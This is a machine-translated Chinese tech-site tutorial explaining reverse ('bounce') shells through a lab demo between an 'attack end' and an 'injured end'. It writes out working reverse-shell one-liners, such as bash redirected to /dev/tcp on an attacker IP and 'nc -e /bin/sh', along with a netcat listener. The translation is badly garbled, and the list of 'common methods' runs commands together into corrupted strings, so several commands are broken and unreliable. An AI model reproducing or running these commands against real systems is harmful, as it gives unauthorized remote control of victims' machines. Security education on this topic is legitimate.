Shulou(Shulou.com)05/31 Report--

Editor to share with you what the meaning of rebound shell, I believe that most people do not know much, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to understand it!

* solemnly declare: this article is limited to technical discussion and sharing, and is strictly prohibited to be used in illegal channels.

Preface of 0x00

Bounce shell, that is, the controller listens to a TCP/UDP port, and the controlled terminal initiates a request to the port, and transfers the input and output of its command line to the controller.

To put it popularly, bouncing shell is a kind of reverse link. Unlike forward ssh, it is an attack mode in which commands are executed on the other computer and connected to us, and this attack mode must be used in conjunction with remote command execution vulnerabilities.

Why bounce back shell? It is usually used in the case that the controlled end is limited by the firewall, insufficient permissions, occupied ports and so on.

Suppose we attack a machine and open a port of the machine, and the attacker connects to the target machine on his own machine, which is a more conventional form, which we call forward connection. Remote desktops, web services, ssh,telnet, etc., are all forward connections.

So under what circumstances does the forward connection not work well:

1. A client has been hit by your network horse, but it is in the local area network, you can not connect directly.

two。 Its ip changes dynamically, and you can't control it continuously.

3. Due to restrictions such as firewalls, the other machine can only send requests and cannot receive requests.

4. For viruses, Trojans, when the victim can be hit, what the other party's network environment is like, when to switch on and off, are unknown, so the establishment of a server, let malicious programs actively connect, is the best policy.

Then the rebound is easy to understand. The attacker specifies the server, and the victim host actively connects to the attacker's server program, which is called bounce shell.

0x01 bounce shell demo

Let's use an example of a bash remote code execution vulnerability to understand how it works.

Attack end: 10.100.40.5 injured: 192.168.197.136

First of all, we need to listen to the port on the attack side and use this port to receive the shell bounced by the victim.

Enter the command nc-l 2333 on the attacking side

Then execute the order on the injured machine.

Bash-I > & / dev/tcp/10.100.40.5/2333 0 > & 1

We found that the shell of our injured side has successfully appeared on our attack side, and we can take the next step on the injured side on our attack side.

For example:

0x02 principle 2.1 Command principle of bouncing shell

(1) bash-I

Bash is a more common shell of linux and is the default Shell for many Linux distributions.

The-I parameter means to generate an interactive shell

(2). / dev/tcp/ip/port

/ dev/tcp | udp/ip/port is a special file. In fact, you can think of it as a device (everything is a file under Linux). In fact, if you access the location of this file, it does not exist, as shown below:

(3) but if you read and write the file while one party is listening to the port, you can achieve socket communication with the server listening to the port.

We output characters to the / dev/tcp file

Injured end:

Attack end:

(4) next we are looking at transferring the output to the injured side, continuing to listen to port 2333 on the attack side, and entering content on the attack side will appear on the injured side.

(5) in this way, the idea is clearer. Let's talk about interactive redirection:

In order to interact, we need to redirect the output of the victim's interactive shell to the attack machine

Enter on the victim's machine:

Bash-I > / dev/tcp 10.100.40.5 hand 2333

Then we find that no matter what instruction is entered, there is no echo, and the echo appears when the standard output of the attack side is directed to the attack side.

This is just an echo, and there is no way to execute the command directly on the attacking side.

(6) so we also need to enter the instructions entered by the attacker into the victim's bash:

Bash-I

/ dev/tcp/10.100.40.5/2333 0 > & 1

Injured end:

Attack end:

We find that we have fully realized our requirements, execute the command on the attack side, and echo that the input 0 is input by / dev/tcp/192.168.146.129/2333, that is, the input of the attack machine, and the result of command execution 1 will be output to / dev/tcp/192.168.156.129/2333, which forms a loop and realizes our function of remote interactive shell.

We found that there is still a small problem. We can see that although the result of command execution is echoed on the attacking side, the injured side still has a command echo.

So we need to solve this problem.

Command:

Bash-I > / dev/tcp/10.100.40.5/2333 0 > & 1 2 > & 1

In this way, the order will not be reflected to the injured end.

Even the error output will be output to the attacking side, which achieves our goal.

2.2 Common bounce shell methods

(1) method 1

Bash-I > & / dev/tcp/10.100.40.5/2333 0 & / dev/tcp/10.100.40.5/2333 0room1 and 0 & / dev/tcp/10.100.40.5/2333 & / dev/tcp/10.100.40.5/2333 0roomamp1 / dev/tcp/10.100.40.5/2333 0roomamp1

(4) method 4

Nc-e / bin/sh 10.100.40.5 2333 is all the content of this article "what is the meaning of bouncing shell?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.